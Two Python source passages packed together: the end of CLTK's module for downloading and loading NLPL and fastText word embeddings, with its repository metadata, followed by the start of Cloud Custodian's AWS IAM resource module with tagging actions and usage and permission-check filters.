        :param silent: Suppress console messages; incompatible with
            ``interactive``.
        :param overwrite: Re-download the model even if already present.
        :raises ValueError: If ``interactive`` and ``silent`` are both
            True, or ``model_type`` is invalid.
        :raises UnimplementedAlgorithmError: If no NLPL model exists for
            ``iso_code``.
        """
        self.iso_code = iso_code
        self.model_type = model_type
        self.interactive = interactive
        self.silent = silent
        self.overwrite = overwrite
        if self.interactive and self.silent:
            raise ValueError(
                "``interactive`` and ``silent`` options are not compatible with each other."
            )
        self._check_input_params()
        # load model after all checks OK
        self.fp_zip = self._build_zip_filepath()
        self.fp_model = self._build_nlpl_filepath()
        self.fp_model_dirs = os.path.split(self.fp_zip)[0]  # type: str
        if not self._is_nlpl_model_present() or self.overwrite:
            self._download_nlpl_models()
            self._unzip_nlpl_model()
        # else: model already present and ``overwrite=False``; nothing to do.
        # TODO: Log a message in that case.
        self.model: models.keyedvectors.Word2VecKeyedVectors = self._load_model()

    def get_word_vector(self, word: str):
        """Return the embedding array for ``word``, or ``None`` if the
        word is not in the vocabulary."""
        try:
            return self.model.get_vector(word)
        except KeyError:
            return None

    def get_embedding_length(self) -> int:
        """Return the embedding length for the loaded model."""
        return self.model.vector_size

    def get_sims(self, word: str):
        """Return the words most similar to ``word``."""
        return self.model.most_similar(word)

    def _check_input_params(self) -> None:
        """Confirm that input parameters are valid and in a
        valid configuration.
        """
        # 1. check if lang valid
        get_lang(self.iso_code)  # check if iso_code valid
        # 2. check if any NLPL embeddings for this lang
        if self.iso_code not in MAP_NLPL_LANG_TO_URL:
            available_embeddings_str = "', '".join(MAP_NLPL_LANG_TO_URL.keys())
            raise UnimplementedAlgorithmError(
                f"No embedding available for language '{self.iso_code}'. Word2Vec models available for: '{available_embeddings_str}'."
            )
        # 3. assert that model type is valid
        valid_types = ["bin", "txt"]
        if self.model_type not in valid_types:
            unavailable_types_str = "', '".join(valid_types)
            raise ValueError(
                f"Invalid ``model_type`` {self.model_type}. Valid model types: {unavailable_types_str}."
            )

    def _build_zip_filepath(self) -> str:
        """Create filepath where the downloaded .zip file will be saved."""
        url_frag = MAP_NLPL_LANG_TO_URL[self.iso_code].split(".")[-2]  # type: str
        nlpl_id = int(url_frag.split("/")[-1])  # NLPL's numeric model id
        fp_zip = os.path.join(
            CLTK_DATA_DIR, f"{self.iso_code}/embeddings/nlpl/{nlpl_id}.zip"
        )  # type: str
        return fp_zip

    def _build_nlpl_filepath(self) -> str:
        """Create filepath where chosen language should be found."""
        model_dir = os.path.join(
            CLTK_DATA_DIR, f"{self.iso_code}/embeddings/nlpl/"
        )  # type: str
        return os.path.join(model_dir, f"model.{self.model_type}")

    def _is_nlpl_model_present(self) -> bool:
        """Return whether the model file exists on disk."""
        return os.path.isfile(self.fp_model)

    def _download_nlpl_models(self) -> None:
        """Perform complete download of Word2Vec models and save
        them in the appropriate ``cltk_data`` dir.

        :raises CLTKException: If the user declines the download.
        """
        model_url = MAP_NLPL_LANG_TO_URL[self.iso_code]
        if not self.interactive:
            if not self.silent:
                print(
                    f"CLTK message: Going to download file '{model_url}' to '{self.fp_zip} ..."
                )  # pragma: no cover
            get_file_with_progress_bar(model_url=model_url, file_path=self.fp_zip)
        else:
            print(  # pragma: no cover
                "CLTK message: This part of the CLTK depends upon word embedding models from the NLPL project."
            )  # pragma: no cover
            dl_is_allowed = query_yes_no(
                f"Do you want to download file '{model_url}' to '{self.fp_zip}'?"
            )  # type: bool
            if dl_is_allowed:
                get_file_with_progress_bar(model_url=model_url, file_path=self.fp_zip)
            else:
                # Fixed: formerly referenced the non-existent ``self.language``
                # (AttributeError) and wrongly mentioned Stanza.
                raise CLTKException(
                    f"Download of necessary Word2Vec model declined for '{self.iso_code}'. Unable to continue with embeddings processing."
                )

    def _unzip_nlpl_model(self) -> None:
        """Unzip the downloaded model archive into the model dir."""
        with ZipFile(self.fp_zip, "r") as zipfile_obj:
            zipfile_obj.extractall(path=self.fp_model_dirs)

    def _load_model(self) -> models.keyedvectors.Word2VecKeyedVectors:
        """Load model into memory.

        :raises UnicodeDecodeError: If Gensim cannot decode the model file.

        TODO: When testing show that this is a Gensim type
        TODO: Suppress Gensim info printout from screen
        """
        # KJ added these two checks because NLPL embeddings
        # began erring in Gensim (Oct 2021)
        is_binary: bool = False
        unicode_errors: str = "strict"
        if self.fp_model.endswith(".txt"):
            unicode_errors = "ignore"
        if self.fp_model.endswith(".bin"):
            is_binary = True
        try:
            return models.KeyedVectors.load_word2vec_format(
                self.fp_model,
                binary=is_binary,
                unicode_errors=unicode_errors,
            )
        except UnicodeDecodeError:
            msg = f"Cannot open file '{self.fp_model}' with Gensim 'load_word2vec_format'."
            print(msg)
            # Re-raise the caught exception; ``raise UnicodeDecodeError`` (the
            # bare class) would itself crash with TypeError, because the
            # constructor requires five arguments.
            raise
class FastTextEmbeddings:
    """Wrapper for fastText embeddings."""

    def __init__(
        self,
        iso_code: str,
        training_set: str = "wiki",
        model_type: str = "vec",
        interactive: bool = True,
        overwrite: bool = False,
        silent: bool = False,
    ):
        """Constructor for ``FastTextEmbeddings`` class.

        :param iso_code: ISO code of the language; must appear in
            ``MAP_LANGS_CLTK_FASTTEXT``.
        :param training_set: ``"wiki"`` or ``"common_crawl"``.
        :param model_type: ``"vec"`` or ``"bin"``.
        :param interactive: Prompt the user before downloading.
        :param overwrite: Re-download the model even if already present.
        :param silent: Suppress console messages; incompatible with
            ``interactive``.
        :raises ValueError: If ``interactive`` and ``silent`` are both True.
        :raises CLTKException: If ``model_type`` or ``training_set`` is
            invalid for the chosen language.
        :raises UnimplementedAlgorithmError: If no fastText model exists
            for ``iso_code``.
        """
        self.iso_code = iso_code
        self.training_set = training_set
        self.model_type = model_type
        self.interactive = interactive
        self.silent = silent
        self.overwrite = overwrite
        if self.interactive and self.silent:
            raise ValueError(
                "``interactive`` and ``silent`` options are not compatible with each other."
            )
        self._check_input_params()
        # load model after all checks OK
        self.model_fp = self._build_fasttext_filepath()
        if not self._is_model_present() or self.overwrite:
            self.download_fasttext_models()
        # else: model already present and ``overwrite=False``; nothing to do.
        # TODO: Log a message in that case.
        self.model = self._load_model()

    def get_word_vector(self, word: str):
        """Return the embedding array for ``word``, or ``None`` if the
        word is not in the vocabulary."""
        try:
            return self.model.get_vector(word)
        except KeyError:
            # TODO: To get an embedding from an OOV for sub-words, load the ``.bin`` file, too: `https://radimrehurek.com/gensim/models/fasttext.html#gensim.models.fasttext.load_facebook_model``_
            return None

    def get_embedding_length(self) -> int:
        """Return the embedding length for the loaded model."""
        return self.model.vector_size

    def get_sims(self, word: str):
        """Return the words most similar to ``word``."""
        return self.model.most_similar(word)

    def download_fasttext_models(self):
        """Perform complete download of fastText models and save
        them in the appropriate ``cltk_data`` dir.

        :raises CLTKException: If the user declines the download.

        TODO: Add tests
        TODO: Implement ``overwrite``
        TODO: error out better or continue to _load_model?
        """
        model_url = self._build_fasttext_url()
        if not self.interactive:
            if not self.silent:
                print(
                    f"CLTK message: Going to download file '{model_url}' to '{self.model_fp} ..."
                )  # pragma: no cover
            get_file_with_progress_bar(model_url=model_url, file_path=self.model_fp)
        else:
            print(  # pragma: no cover
                "CLTK message: This part of the CLTK depends upon word embedding models from the Fasttext project."
            )  # pragma: no cover
            dl_is_allowed = query_yes_no(
                f"Do you want to download file '{model_url}' to '{self.model_fp}'?"
            )  # type: bool
            if dl_is_allowed:
                get_file_with_progress_bar(model_url=model_url, file_path=self.model_fp)
            else:
                # Fixed: message formerly referred to Stanza (copy-paste).
                raise CLTKException(
                    f"Download of necessary fastText model declined for '{self.iso_code}'. Unable to continue with embeddings processing."
                )

    def _is_model_present(self):
        """Return whether the model file exists on disk."""
        return os.path.isfile(self.model_fp)

    def _check_input_params(self):
        """Look at the combination of parameters given to the class
        and determine if any invalid combination or missing models.
        """
        # 1. check if lang valid
        get_lang(self.iso_code)  # check if iso_code valid
        # 2. check if any fasttext embeddings for this lang
        if not self._is_fasttext_lang_available():
            available_embeddings_str = "', '".join(MAP_LANGS_CLTK_FASTTEXT.keys())
            raise UnimplementedAlgorithmError(
                f"No embedding available for language '{self.iso_code}'. FastTextEmbeddings available for: '{available_embeddings_str}'."
            )
        # 3. check if requested model type is available for fasttext
        valid_model_types = ["bin", "vec"]
        if self.model_type not in valid_model_types:
            # Fixed: ``.join(...)`` was missing, so the error message
            # printed the literal separator instead of the valid types.
            valid_model_types_str = "', '".join(valid_model_types)
            raise CLTKException(
                f"Invalid model type '{self.model_type}'. Choose: '{valid_model_types_str}'."
            )
        # 4. check if requested training set is available for language for fasttext
        training_sets = ["common_crawl", "wiki"]
        if self.training_set not in training_sets:
            training_sets_str = "', '".join(training_sets)
            raise CLTKException(
                f"Invalid ``training_set`` '{self.training_set}'. Available: '{training_sets_str}'."
            )
        available_vectors = list()
        if self.training_set == "wiki":
            available_vectors = ["ang", "arb", "arc", "got", "lat", "pli", "san"]
        elif self.training_set == "common_crawl":
            available_vectors = ["arb", "lat", "san"]
        else:
            # Defensive; unreachable after check #4. Fixed: the exception
            # was formerly constructed but never raised.
            raise CLTKException("Unanticipated exception.")
        if self.iso_code not in available_vectors:
            available_vectors_str = "', '".join(available_vectors)
            raise CLTKException(
                f"Training set '{self.training_set}' not available for language '{self.iso_code}'. Languages available for this training set: '{available_vectors_str}'."
            )

    def _load_model(self):
        """Load model into memory.

        TODO: When testing show that this is a Gensim type
        TODO: Suppress Gensim info printout from screen
        """
        return models.KeyedVectors.load_word2vec_format(self.model_fp)

    def _is_fasttext_lang_available(self) -> bool:
        """Returns whether any vectors are available, for
        fastText, for the input language. This is not comprehensive
        of all fastText embeddings, only those added into the CLTK.
        """
        get_lang(iso_code=self.iso_code)
        return self.iso_code in MAP_LANGS_CLTK_FASTTEXT

    def _build_fasttext_filepath(self):
        """Create filepath at which to save a downloaded
        fasttext model.

        .. todo::
           Do better than test for just name. Try trimming up to user home dir.

        >>> from cltk.embeddings.embeddings import FastTextEmbeddings  # doctest: +SKIP
        >>> embeddings_obj = FastTextEmbeddings(iso_code="lat", silent=True)  # doctest: +SKIP
        >>> vec_fp = embeddings_obj._build_fasttext_filepath()  # doctest: +SKIP
        >>> os.path.split(vec_fp)[1]  # doctest: +SKIP
        'wiki.la.vec'
        >>> embeddings_obj = FastTextEmbeddings(iso_code="lat", model_type="bin", silent=True)  # doctest: +SKIP
        >>> bin_fp = embeddings_obj._build_fasttext_filepath()  # doctest: +SKIP
        >>> os.path.split(bin_fp)[1]  # doctest: +SKIP
        'wiki.la.bin'
        >>> embeddings_obj = FastTextEmbeddings(iso_code="lat", training_set="common_crawl", model_type="vec", silent=True)  # doctest: +SKIP
        >>> os.path.split(vec_fp)[1]  # doctest: +SKIP
        'cc.la.300.vec'
        >>> embeddings_obj = FastTextEmbeddings(iso_code="lat", training_set="common_crawl", model_type="bin", silent=True)  # doctest: +SKIP
        >>> bin_fp = embeddings_obj._build_fasttext_filepath()  # doctest: +SKIP
        >>> vec_fp = embeddings_obj._build_fasttext_filepath()  # doctest: +SKIP
        >>> os.path.split(bin_fp)[1]  # doctest: +SKIP
        'cc.la.300.bin'
        """
        fasttext_code = MAP_LANGS_CLTK_FASTTEXT[self.iso_code]
        fp_model = None
        if self.training_set == "wiki":
            fp_model = os.path.join(
                CLTK_DATA_DIR,
                self.iso_code,
                "embeddings",
                "fasttext",
                f"wiki.{fasttext_code}.{self.model_type}",
            )
        elif self.training_set == "common_crawl":
            fp_model = os.path.join(
                CLTK_DATA_DIR,
                self.iso_code,
                "embeddings",
                "fasttext",
                f"cc.{fasttext_code}.300.{self.model_type}",
            )
        else:
            raise CLTKException(f"Unexpected ``training_set`` ``{self.training_set}``.")
        return fp_model

    def _build_fasttext_url(self):
        """Make the URL at which the requested model may be
        downloaded."""
        fasttext_code = MAP_LANGS_CLTK_FASTTEXT[self.iso_code]
        if self.training_set == "wiki":
            if self.model_type == "vec":
                ending = "vec"
            else:
                # for .bin
                ending = "zip"
            url = f"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.{fasttext_code}.{ending}"
        elif self.training_set == "common_crawl":
            url = f"https://dl.fbaipublicfiles.com/fasttext/vectors-crawl/cc.{fasttext_code}.300.{self.model_type}.gz"
        else:
            raise CLTKException("Unexpected exception.")
        return url
|
{
"content_hash": "10d63c0dcc73fd6e154ffe380a466ede",
"timestamp": "",
"source": "github",
"line_count": 564,
"max_line_length": 195,
"avg_line_length": 39.8031914893617,
"alnum_prop": 0.584257650674863,
"repo_name": "kylepjohnson/cltk",
"id": "e11245ec5ba782b993619316fa3834a77f779fc6",
"size": "22449",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "src/cltk/embeddings/embeddings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "120521"
},
{
"name": "Makefile",
"bytes": "2633"
},
{
"name": "Python",
"bytes": "3336083"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import, division, print_function, unicode_literals
from collections import OrderedDict
import csv
import datetime
import functools
import json
import io
from datetime import timedelta
import itertools
import time
from concurrent.futures import as_completed
from dateutil.tz import tzutc
from dateutil.parser import parse as parse_date
import six
from botocore.exceptions import ClientError
from c7n.actions import BaseAction
from c7n.exceptions import PolicyValidationError
from c7n.filters import ValueFilter, Filter
from c7n.filters.multiattr import MultiAttrFilter
from c7n.filters.iamaccess import CrossAccountAccessFilter
from c7n.manager import resources
from c7n.query import QueryResourceManager, DescribeSource, TypeInfo
from c7n.resolver import ValuesFrom
from c7n.tags import TagActionFilter, TagDelayedAction, Tag, RemoveTag
from c7n.utils import local_session, type_schema, chunks, filter_empty, QueryParser
from c7n.resources.aws import Arn
from c7n.resources.securityhub import OtherResourcePostFinding
@resources.register('iam-group')
class Group(QueryResourceManager):
    """IAM Group resource manager (global, not region-scoped)."""

    class resource_type(TypeInfo):
        service = 'iam'
        arn_type = 'group'
        enum_spec = ('list_groups', 'Groups', None)
        id = name = 'GroupName'
        date = 'CreateDate'
        config_type = "AWS::IAM::Group"
        # Denotes this resource type exists across regions
        global_resource = True
        arn = 'Arn'

    def get_resources(self, resource_ids, cache=True):
        """For IAM Groups on events, resource ids are Group Names.

        Fetches each group by name, skipping names that no longer
        exist, and attaches the group's members under ``c7n:Users``.
        """
        client = local_session(self.session_factory).client('iam')
        # Renamed from ``resources`` to avoid shadowing the module-level
        # ``c7n.manager.resources`` registry imported above.
        groups = []
        for rid in resource_ids:
            try:
                result = client.get_group(GroupName=rid)
            except client.exceptions.NoSuchEntityException:
                continue
            group = result.pop('Group')
            group['c7n:Users'] = result['Users']
            groups.append(group)
        return groups
@resources.register('iam-role')
class Role(QueryResourceManager):
    """Resource manager for IAM roles (``iam-role``)."""
    class resource_type(TypeInfo):
        service = 'iam'
        arn_type = 'role'
        enum_spec = ('list_roles', 'Roles', None)
        # Each listed role is augmented with its full get_role record.
        detail_spec = ('get_role', 'RoleName', 'RoleName', 'Role')
        id = name = 'RoleName'
        date = 'CreateDate'
        config_type = "AWS::IAM::Role"
        # Denotes this resource type exists across regions
        global_resource = True
        arn = 'Arn'
@Role.action_registry.register('tag')
class RoleTag(Tag):
    """Apply tags to an iam role."""
    permissions = ('iam:TagRole',)
    def process_resource_set(self, client, roles, tags):
        # Tag each role in turn; roles deleted since the resource
        # query was made simply drop out of the set.
        retry = self.manager.retry
        for resource in roles:
            try:
                retry(client.tag_role,
                      RoleName=resource['RoleName'], Tags=tags)
            except client.exceptions.NoSuchEntityException:
                continue
@Role.action_registry.register('remove-tag')
class RoleRemoveTag(RemoveTag):
    """Strip tags from an iam role."""
    permissions = ('iam:UntagRole',)
    def process_resource_set(self, client, roles, tags):
        # Untag each role; roles that vanished since the resource
        # query are ignored.
        retry = self.manager.retry
        for resource in roles:
            try:
                retry(client.untag_role,
                      RoleName=resource['RoleName'], TagKeys=tags)
            except client.exceptions.NoSuchEntityException:
                continue
@resources.register('iam-user')
class User(QueryResourceManager):
    """Resource manager for IAM users (``iam-user``)."""
    class resource_type(TypeInfo):
        service = 'iam'
        arn_type = 'user'
        # Each listed user is augmented with its full get_user record.
        detail_spec = ('get_user', 'UserName', 'UserName', 'User')
        enum_spec = ('list_users', 'Users', None)
        id = name = 'UserName'
        date = 'CreateDate'
        config_type = "AWS::IAM::User"
        # Denotes this resource type exists across regions
        global_resource = True
        arn = 'Arn'
    def get_source(self, source_type):
        # Use the custom describe source so event-supplied user names
        # can be resolved via get_user.
        if source_type == 'describe':
            return DescribeUser(self)
        return super(User, self).get_source(source_type)
class DescribeUser(DescribeSource):
    """Describe source resolving user names to full user records."""
    def get_resources(self, resource_ids, cache=True):
        # Resolve each user name via get_user; names that no longer
        # exist are silently dropped.
        client = local_session(self.manager.session_factory).client('iam')
        users = []
        for name in resource_ids:
            try:
                info = client.get_user(UserName=name)
            except client.exceptions.NoSuchEntityException:
                continue
            users.append(info['User'])
        return users
@User.action_registry.register('tag')
class UserTag(Tag):
    """Apply tags to an iam user."""
    permissions = ('iam:TagUser',)
    def process_resource_set(self, client, users, tags):
        # Tag each user; users deleted since the resource query was
        # made simply drop out of the set.
        retry = self.manager.retry
        for user in users:
            try:
                retry(client.tag_user,
                      UserName=user['UserName'], Tags=tags)
            except client.exceptions.NoSuchEntityException:
                continue
@User.action_registry.register('remove-tag')
class UserRemoveTag(RemoveTag):
    """Strip tags from an iam user."""
    permissions = ('iam:UntagUser',)
    def process_resource_set(self, client, users, tags):
        # Untag each user; users that vanished since the resource
        # query are ignored.
        retry = self.manager.retry
        for user in users:
            try:
                retry(client.untag_user,
                      UserName=user['UserName'], TagKeys=tags)
            except client.exceptions.NoSuchEntityException:
                continue
# Standard tag based deferred-op support on iam users
# (mark-for-op action paired with the marked-for-op filter).
User.action_registry.register('mark-for-op', TagDelayedAction)
User.filter_registry.register('marked-for-op', TagActionFilter)
@User.action_registry.register('set-groups')
class SetGroups(BaseAction):
    """Add an IAM user to, or remove it from, a named group.
    :example:
    .. code-block:: yaml
            - name: iam-user-add-remove
              resource: iam-user
              filters:
                - type: value
                  key: UserName
                  value: Bob
              actions:
                - type: set-groups
                  state: remove
                  group: Admin
    """
    schema = type_schema(
        'set-groups',
        state={'enum': ['add', 'remove']},
        group={'type': 'string'},
        required=['state', 'group']
    )
    permissions = ('iam:AddUserToGroup', 'iam:RemoveUserFromGroup',)
    def validate(self):
        # An empty group name is a policy configuration error.
        if self.data.get('group') == '':
            raise PolicyValidationError(
                'group cannot be empty on %s' % (self.manager.data))
    def process(self, resources):
        client = local_session(self.manager.session_factory).client('iam')
        ops = {
            'add': client.add_user_to_group,
            'remove': client.remove_user_from_group,
        }
        op = ops[self.data['state']]
        group = self.data['group']
        for user in resources:
            try:
                op(GroupName=group, UserName=user['UserName'])
            except client.exceptions.NoSuchEntityException:
                # User or group vanished since the resource query.
                continue
@resources.register('iam-policy')
class Policy(QueryResourceManager):
    """Resource manager for IAM managed policies (``iam-policy``)."""
    class resource_type(TypeInfo):
        service = 'iam'
        arn_type = 'policy'
        enum_spec = ('list_policies', 'Policies', None)
        id = 'PolicyId'
        name = 'PolicyName'
        date = 'CreateDate'
        config_type = "AWS::IAM::Policy"
        # Denotes this resource type exists across regions
        global_resource = True
        arn = 'Arn'
    def get_source(self, source_type):
        # Custom describe source adds list_policies query support.
        if source_type == 'describe':
            return DescribePolicy(self)
        return super(Policy, self).get_source(source_type)
class DescribePolicy(DescribeSource):
    """Describe source for iam-policy supporting list_policies query filters."""
    def resources(self, query=None):
        # Translate policy-data `query` entries into list_policies
        # parameters (Scope, OnlyAttached, ...), validated by the parser.
        qfilters = PolicyQueryParser.parse(self.manager.data.get('query', []))
        query = query or {}
        if qfilters:
            query = {t['Name']: t['Value'] for t in qfilters}
        return super(DescribePolicy, self).resources(query=query)
    def get_resources(self, resource_ids, cache=True):
        """Resolve policy arns to full policy records.

        Policies that no longer exist are skipped. Any other client
        error now propagates; the previous code caught every
        ClientError and only continued on a 'NoSuchEntityException'
        code match, silently dropping all other failures.
        """
        client = local_session(self.manager.session_factory).client('iam')
        results = []
        for r in resource_ids:
            try:
                results.append(client.get_policy(PolicyArn=r)['Policy'])
            except client.exceptions.NoSuchEntityException:
                # Matches the modeled exception (as DescribeUser does)
                # rather than string-comparing error codes.
                continue
        return results
class PolicyQueryParser(QueryParser):
    """Validates `query` elements destined for iam list_policies calls."""
    QuerySchema = {
        'Scope': ('All', 'AWS', 'Local'),
        'PolicyUsageFilter': ('PermissionsPolicy', 'PermissionsBoundary'),
        'PathPrefix': six.string_types,
        'OnlyAttached': bool
    }
    # list_policies parameters are single valued
    multi_value = False
    value_key = 'Value'
@resources.register('iam-profile')
class InstanceProfile(QueryResourceManager):
    """Resource manager for IAM instance profiles (``iam-profile``)."""
    class resource_type(TypeInfo):
        service = 'iam'
        arn_type = 'instance-profile'
        enum_spec = ('list_instance_profiles', 'InstanceProfiles', None)
        id = 'InstanceProfileId'
        # NOTE(review): `name` points at the id field rather than
        # InstanceProfileName — presumably intentional; confirm.
        name = 'InstanceProfileId'
        date = 'CreateDate'
        # Denotes this resource type exists across regions
        global_resource = True
        arn = 'Arn'
@resources.register('iam-certificate')
class ServerCertificate(QueryResourceManager):
    """Resource manager for IAM server certificates (``iam-certificate``)."""
    class resource_type(TypeInfo):
        service = 'iam'
        arn_type = 'server-certificate'
        enum_spec = ('list_server_certificates',
                     'ServerCertificateMetadataList',
                     None)
        id = 'ServerCertificateId'
        name = 'ServerCertificateName'
        date = 'Expiration'
        # Denotes this resource type exists across regions
        global_resource = True
@User.filter_registry.register('usage')
@Role.filter_registry.register('usage')
@Group.filter_registry.register('usage')
@Policy.filter_registry.register('usage')
class ServiceUsage(Filter):
    """Filter iam resources by their api/service usage.
    Note recent activity (last 4hrs) may not be shown, evaluation
    is against the last 365 days of data.
    Each service access record is evaluated against all specified
    attributes. Attribute filters can be specified in short form k:v
    pairs or in long form as a value type filter.
    match-operator allows to specify how a resource is treated across
    service access record matches. 'any' means a single matching
    service record will return the policy resource as matching. 'all'
    means all service access records have to match.
    Find iam users that have not used any services in the last year
    :example:
    .. code-block:: yaml
            - name: unused-users
              resource: iam-user
              filters:
                - type: usage
                  match-operator: all
                  LastAuthenticated: null
    Find iam users that have used dynamodb in last 30 days
    :example:
    .. code-block:: yaml
            - name: unused-users
              resource: iam-user
              filters:
                - type: usage
                  ServiceNamespace: dynamodb
                  TotalAuthenticatedEntities: 1
                  LastAuthenticated:
                    type: value
                    value_type: age
                    op: less-than
                    value: 30
                  match-operator: any
    https://aws.amazon.com/blogs/security/automate-analyzing-permissions-using-iam-access-advisor/
    """
    JOB_COMPLETE = 'COMPLETED'
    SERVICE_ATTR = set((
        'ServiceName', 'ServiceNamespace', 'TotalAuthenticatedEntities',
        'LastAuthenticated', 'LastAuthenticatedEntity'))
    schema_alias = True
    schema_attr = {
        sa: {'oneOf': [
            {'type': 'string'},
            {'type': 'boolean'},
            {'type': 'number'},
            {'type': 'null'},
            {'$ref': '#/definitions/filters/value'}]}
        for sa in SERVICE_ATTR}
    schema_attr['match-operator'] = {'enum': ['all', 'any']}
    schema_attr['poll-delay'] = {'type': 'number'}
    schema = type_schema(
        'usage',
        required=('match-operator',),
        **schema_attr)
    permissions = ('iam:GenerateServiceLastAccessedDetails',
                   'iam:GetServiceLastAccessedDetails')
    def process(self, resources, event=None):
        client = local_session(self.manager.session_factory).client('iam')
        job_resource_map = {}
        # Kick off one async access-advisor job per resource arn.
        for arn, r in zip(self.manager.get_arns(resources), resources):
            try:
                jid = self.manager.retry(
                    client.generate_service_last_accessed_details,
                    Arn=arn)['JobId']
                job_resource_map[jid] = r
            except client.exceptions.NoSuchEntityException:
                continue
        # Build the record matcher from the non-operator filter keys.
        conf = dict(self.data)
        conf.pop('match-operator')
        saf = MultiAttrFilter(conf)
        saf.multi_attrs = self.SERVICE_ATTR
        results = []
        match_operator = self.data.get('match-operator', 'all')
        # Poll until every job completes, evaluating each job's service
        # access records as it finishes.
        while job_resource_map:
            job_results_map = {}
            for jid, r in job_resource_map.items():
                result = self.manager.retry(
                    client.get_service_last_accessed_details, JobId=jid)
                if result['JobStatus'] != self.JOB_COMPLETE:
                    continue
                job_results_map[jid] = result['ServicesLastAccessed']
            for jid, saf_results in job_results_map.items():
                r = job_resource_map.pop(jid)
                saf_matches = saf.process(saf_results)
                if match_operator == 'all' and len(saf_matches) == len(saf_results):
                    results.append(r)
                elif match_operator != 'all' and saf_matches:
                    # BUGFIX: previously this was a bare `elif saf_matches`,
                    # so an 'all' operator with a partial match fell through
                    # here and behaved exactly like 'any'.
                    results.append(r)
            time.sleep(self.data.get('poll-delay', 2))
        return results
@User.filter_registry.register('check-permissions')
@Group.filter_registry.register('check-permissions')
@Role.filter_registry.register('check-permissions')
@Policy.filter_registry.register('check-permissions')
class CheckPermissions(Filter):
    """Check IAM permissions associated with a resource.
    :example:
    Find users that can create other users
    .. code-block:: yaml
        policies:
          - name: super-users
            resource: iam-user
            filters:
              - type: check-permissions
                match: allowed
                actions:
                 - iam:CreateUser
    """
    schema = type_schema(
        'check-permissions', **{
            'match': {'oneOf': [
                {'enum': ['allowed', 'denied']},
                {'$ref': '#/definitions/filters/valuekv'},
                {'$ref': '#/definitions/filters/value'}]},
            'match-operator': {'enum': ['and', 'or']},
            'actions': {'type': 'array', 'items': {'type': 'string'}},
            'required': ('actions', 'match')})
    schema_alias = True
    # Annotation keys used on matched resources.
    policy_annotation = 'c7n:policy'
    eval_annotation = 'c7n:perm-matches'
    def get_permissions(self):
        # Policies are simulated as custom documents; principals
        # (users/groups/roles) via their arn.
        if self.manager.type == 'iam-policy':
            return ('iam:SimulateCustomPolicy',)
        return ('iam:SimulatePrincipalPolicy',)
    def process(self, resources, event=None):
        client = local_session(self.manager.session_factory).client('iam')
        actions = self.data['actions']
        matcher = self.get_eval_matcher()
        # 'and' requires all simulated actions to match, 'or' any one.
        operator = self.data.get('match-operator', 'and') == 'and' and all or any
        results = []
        eval_cache = {}
        for arn, r in zip(self.get_iam_arns(resources), resources):
            if arn is None:
                continue
            # Simulation results are cached per arn as resources can
            # repeat (e.g. detail records for the same principal).
            if arn in eval_cache:
                evaluations = eval_cache[arn]
            else:
                evaluations = self.get_evaluations(client, arn, r, actions)
                eval_cache[arn] = evaluations
            matches = []
            matched = []
            for e in evaluations:
                match = matcher(e)
                if match:
                    matched.append(e)
                matches.append(match)
            if operator(matches):
                r[self.eval_annotation] = matched
                results.append(r)
        return results
    def get_iam_arns(self, resources):
        # Seam for subclasses / alternate arn resolution.
        return self.manager.get_arns(resources)
    def get_evaluations(self, client, arn, r, actions):
        """Run the policy simulator for one resource, returning its
        EvaluationResults (one per requested action)."""
        if self.manager.type == 'iam-policy':
            policy = r.get(self.policy_annotation)
            if policy is None:
                # Consistency fix: annotate via self.policy_annotation
                # instead of the duplicated 'c7n:policy' literal.
                r[self.policy_annotation] = policy = client.get_policy_version(
                    PolicyArn=r['Arn'],
                    VersionId=r['DefaultVersionId']).get('PolicyVersion', {})
            evaluations = self.manager.retry(
                client.simulate_custom_policy,
                PolicyInputList=[json.dumps(policy['Document'])],
                ActionNames=actions).get('EvaluationResults', ())
        else:
            evaluations = self.manager.retry(
                client.simulate_principal_policy,
                PolicySourceArn=arn,
                ActionNames=actions).get('EvaluationResults', ())
        return evaluations
    def get_eval_matcher(self):
        # Shorthand 'allowed'/'denied' expands to an EvalDecision value
        # filter; otherwise the user supplied a full value filter.
        if isinstance(self.data['match'], six.string_types):
            if self.data['match'] == 'denied':
                values = ['explicitDeny', 'implicitDeny']
            else:
                values = ['allowed']
            vf = ValueFilter({'type': 'value', 'key':
                              'EvalDecision', 'value': values,
                              'op': 'in'})
        else:
            vf = ValueFilter(self.data['match'])
        vf.annotate = False
        return vf
class IamRoleUsage(Filter):
    """Base filter computing which iam roles / instance profiles are in use.
    Usage is derived from lambda functions, ecs services, and
    ec2 / asg instance profiles.
    """
    def get_permissions(self):
        # Union of the permissions needed by the resource scans below.
        perms = list(itertools.chain(*[
            self.manager.get_resource_manager(m).get_permissions()
            for m in ['lambda', 'launch-config', 'ec2']]))
        perms.extend(['ecs:DescribeClusters', 'ecs:DescribeServices'])
        return perms
    def service_role_usage(self):
        # Role arns/names referenced by lambda, ecs, and instance profiles.
        results = set()
        results.update(self.scan_lambda_roles())
        results.update(self.scan_ecs_roles())
        results.update(self.collect_profile_roles())
        return results
    def instance_profile_usage(self):
        # Instance profile identifiers referenced by asg launch configs
        # and running ec2 instances.
        results = set()
        results.update(self.scan_asg_roles())
        results.update(self.scan_ec2_roles())
        return results
    def scan_lambda_roles(self):
        # Execution role arns of all lambda functions.
        manager = self.manager.get_resource_manager('lambda')
        return [r['Role'] for r in manager.resources() if 'Role' in r]
    def scan_ecs_roles(self):
        # Service role arns across ecs clusters.
        # NOTE(review): describe_clusters() with no arguments appears to
        # describe only the default cluster — confirm this covers all
        # clusters as intended.
        results = []
        client = local_session(self.manager.session_factory).client('ecs')
        for cluster in client.describe_clusters()['clusters']:
            services = client.list_services(
                cluster=cluster['clusterName'])['serviceArns']
            if services:
                for service in client.describe_services(
                        cluster=cluster['clusterName'],
                        services=services)['services']:
                    if 'roleArn' in service:
                        results.append(service['roleArn'])
        return results
    def collect_profile_roles(self):
        # Collect iam roles attached to instance profiles of EC2/ASG resources
        profiles = set()
        profiles.update(self.scan_asg_roles())
        profiles.update(self.scan_ec2_roles())
        manager = self.manager.get_resource_manager('iam-profile')
        iprofiles = manager.resources()
        results = []
        for p in iprofiles:
            if p['InstanceProfileName'] not in profiles:
                continue
            for role in p.get('Roles', []):
                results.append(role['RoleName'])
        return results
    def scan_asg_roles(self):
        # Instance profile references from asg launch configurations.
        manager = self.manager.get_resource_manager('launch-config')
